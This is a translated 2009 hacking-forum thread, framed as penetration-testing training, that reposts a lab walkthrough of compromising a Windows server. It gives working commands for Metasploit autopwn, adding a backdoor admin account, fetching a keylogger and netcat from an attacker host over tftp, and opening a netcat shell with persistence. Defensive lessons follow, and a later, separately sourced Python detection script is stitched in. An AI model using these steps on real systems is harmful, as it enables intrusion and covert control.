:: vBspiders Professional Network :: Penetration Testing Training: Remote Exploitation (http://www.vbspiders.com/vb/showthread.php?t=15884)

NEVER HaCKEr 07-23-2009 01:57 AM

Remote Exploitation
 


Peace be upon you, and the mercy and blessings of God.



==


This thread is about the Metasploit project and remote vulnerabilities that can be exploited in several ways.
Metasploit

Remote Exploitation
The purpose of this blog entry is to demonstrate how easy it is for an attacker to use freely available tools to exploit servers and gain root (administrative) access. I also look at how this attack might have been spotted from the defender's point of view and what could have been done to prevent it.

Tools

  • Backtrack3
  • TCPDump
  • Nmap
  • FastTrack
  • Netcat
Below I will list the steps I took to own the server, plant a keylogger and a backdoor, and then set up the backdoor. This is a very basic attack and my aim is to demonstrate how an attacker with a relatively low skill level can succeed in exploiting your box.

I'll be using FastTrack as my primary tool to gain root. FastTrack is kind of like a front-end for Metasploit, but it is quite automated and just throws all the exploits at a target and builds a nice database as it goes. So it is very noisy and has a greater chance of crashing the target. Once finished it lists the sessions ready for the attacker to connect to.


The Attack

1. I start up a sniffer to see what's about and I discover a host that may be fun to play with. This was done using TCPdump.

tcpdump -i eth0 -vv

http://1.bp.blogspot.com/_vZAp7b1QDw...00/tcpdump.jpg

2. On the discovered host I use nmap to verify the open ports and the listening services. I just let nmap use the default port list rather than specifying a range at this time.

nmap 192.168.2.2 -T 4 -sV -P0 -n

http://3.bp.blogspot.com/_vZAp7b1QDw.../s400/nmap.jpg

3. After loading up FastTrack I select the "External Hackin" option.

4. Next I select "Autopwn Metasploit Automated" & enter the IP of my target.

http://1.bp.blogspot.com/_vZAp7b1QDw...selections.jpg

5. I choose the database type of sqlite3. When prompted to update Metasploit I select "No" because I'm in a lab and I have no internet access. FastTrack goes to work and does its noisy magic.

http://4.bp.blogspot.com/_vZAp7b1QDw...ck+at+work.jpg

6. FastTrack has found 2 vulnerabilities that it has successfully exploited. Using the sessions -l command I can see these listed.

http://4.bp.blogspot.com/_vZAp7b1QDw...0/sessions.jpg

7. I pick a session and use it to connect to the server and I use the "whoami" command to verify that I am logged in as a system account with admin privileges.

http://3.bp.blogspot.com/_vZAp7b1QDw...00/connect.jpg

8. I now go and add a new user and give the account admin rights using the "net user" and "net localgroup" commands.

net user synjunkie Password123 /add
net localgroup Administrators synjunkie /add

http://1.bp.blogspot.com/_vZAp7b1QDw...00/adduser.jpg

9. If I want a nice GUI I use RDP to connect to the host.

http://3.bp.blogspot.com/_vZAp7b1QDw...0/s400/rdp.jpg

And now I can begin to look around my target and, if necessary, set up other back doors.

http://4.bp.blogspot.com/_vZAp7b1QDw...s400/bingo.jpg


10. And if I want to get my tools onto the box to set the backdoor up or log keystrokes it's no problem. I set up a TFTP server on my attacking box and use Windows' built-in "tftp" command to pull across some tools.

tftp -i 192.168.2.1 GET klogger.exe
tftp -i 192.168.2.1 GET nc.exe

http://4.bp.blogspot.com/_vZAp7b1QDw.../s400/tftp.jpg


11. For my backdoor I create a netcat listener and shovel a shell back to whoever connects to it.

nc -p 6666 -L -e cmd.exe

http://2.bp.blogspot.com/_vZAp7b1QDw...400/owned1.jpg

To maintain access I could either use the "reg" command to create a registry entry to auto-start my backdoor at each reboot, or create a batch file and put it in the startup folder.

And on the attacker's box I connect to my newly created backdoor.

nc 192.168.2.2 6666

http://3.bp.blogspot.com/_vZAp7b1QDw...0/backdoor.jpg


owned!

http://4.bp.blogspot.com/_vZAp7b1QDw...s400/owned.jpg


Detection & Lessons Learned

1. The server was behind on its patches. Patching is fundamental to securing a system.

2. The server had loads of listening services. Were all these services necessary? If not, shut them down.

3. A new account was added to an administrator group. The Administrators group should always be closely monitored for unauthorised changes.

http://2.bp.blogspot.com/_vZAp7b1QDw...0/accounts.jpg

4. From analysing the logs, this attack was very noisy and could easily have been detected.

Below are screenprints of the ftp and web logs. It is evident from these that an attack has taken place.

http://3.bp.blogspot.com/_vZAp7b1QDw.../s400/logs.jpg

More tell-tale logs!

http://1.bp.blogspot.com/_vZAp7b1QDw...s400/logs1.jpg

And the screenshot below shows that unauthorised entry has occurred.

http://3.bp.blogspot.com/_vZAp7b1QDw...400/seclog.jpg

However, this is after the attack and the damage could have already been done. Any decent attacker will also modify or delete logs, so setting up a hardened syslog server is a good idea. Most admins will set up a syslog server without realising that it needs hardening, as it will be critical to you in the event of an attack: it can provide valuable information to help you identify the source of the attack and also help you learn from it to better protect your systems in the future.




Thank you for stopping by.

Your brother,


NEVER HaCKEr
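Lesson 3 above says the Administrators group must be watched for unauthorised changes, and lesson 4 says the attack was noisy enough to spot in the logs. The following is an added example of that detection logic, not part of the original post or blog: it runs over a constructed, simplified export of Windows Security events (IDs 4720 "user account created" and 4732 "member added to a local group") and flags the pattern from steps 7 and 8, a SYSTEM-level process creating an account and dropping it into Administrators seconds later. The CSV layout and sample values are assumptions made for the example.

```python
import csv
import io
from datetime import datetime, timedelta

# Windows Security log event IDs (Vista/2008 and later):
#   4720 = a user account was created
#   4732 = a member was added to a security-enabled local group
USER_CREATED = "4720"
MEMBER_ADDED = "4732"
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}
WINDOW = timedelta(minutes=5)  # create-then-elevate within this window is suspicious

# Constructed sample export (assumed layout: event_id,time,subject,target,group);
# these are not the screenshots from the original post.
SAMPLE_LOG = """\
4720,2009-07-23 01:41:15,NT AUTHORITY\\SYSTEM,synjunkie,
4732,2009-07-23 01:41:16,NT AUTHORITY\\SYSTEM,synjunkie,Administrators
4732,2009-07-23 09:12:40,CORP\\helpdesk,jdoe,Remote Desktop Users
4720,2009-07-23 09:15:00,CORP\\helpdesk,tempuser,
"""

def parse_events(text):
    """Turn the CSV export into dicts with a parsed timestamp."""
    rows = []
    for event_id, ts, subject, target, group in csv.reader(io.StringIO(text)):
        rows.append({"id": event_id, "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                     "subject": subject, "target": target, "group": group})
    return rows

def find_suspicious_admin_changes(text):
    """Return (severity, account, time, reasons) for each privileged-group addition."""
    created = {}  # account -> time of its most recent 4720 event
    alerts = []
    for ev in parse_events(text):
        if ev["id"] == USER_CREATED:
            created[ev["target"]] = ev["time"]
        elif ev["id"] == MEMBER_ADDED and ev["group"] in PRIVILEGED_GROUPS:
            reasons = [f"added to {ev['group']}"]
            # An interactive admin shows up as a named user; SYSTEM here means a service
            # or exploited process did it, as in the "whoami" check in step 7.
            if ev["subject"].upper().endswith("SYSTEM"):
                reasons.append("change made by a SYSTEM account, not an admin")
            birth = created.get(ev["target"])
            if birth is not None and ev["time"] - birth <= WINDOW:
                reasons.append(f"account created {(ev['time'] - birth).seconds}s earlier")
            severity = "high" if len(reasons) > 1 else "medium"
            alerts.append((severity, ev["target"], ev["time"].isoformat(sep=" "), reasons))
    return alerts

if __name__ == "__main__":
    for severity, account, when, reasons in find_suspicious_admin_changes(SAMPLE_LOG):
        print(f"[{severity}] {when} {account}: {'; '.join(reasons)}")
```

The same rule can be fed from a real export (for example `wevtutil` or forwarded syslog) once the columns are mapped; the point is that the create-then-elevate sequence is distinctive regardless of the tool that produced it.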



PASSEWORD 07-23-2009 02:16 AM

An interesting thread; it needs some time to read in full.
Thank you.

NEVER HaCKEr 07-23-2009 02:17 AM

You're welcome, my friend, we didn't do anything.

HACK@R AL BASR3H 07-23-2009 03:37 AM

Thank you so much, my friend, for the explanation.

ابو بدر 07-23-2009 01:54 PM

Great explanation.
Peace.

ViRuS_HiMa 10-28-2009 09:06 PM

Indeed, brother, this is one of the best explanations I have read about tricks or deception, simply because he did not go into Metasploit at length; he just scanned the IP and found a service that could be exploited. But what I liked most about the thread is his discussion of how to keep hold of a Windows box for as long as possible by planting backdoors or putting a registry modification in place to run his backdoor on every reboot of the system.

Thank you, brother, for the thread. May God reward you, and the author of the thread as well.

NEVER HaCKEr 10-30-2009 07:36 PM

Welcome, boss ViRuS_HiMa, loool, you have honoured us with your presence, boss. Let us see your creativity on the forum, ViRuS_HiMa.

Thank you all for stopping by, my dears, and thank you for the great replies ^^

KaLa$nikoV 08-10-2010 09:08 PM

By God, I need an English course hahaha

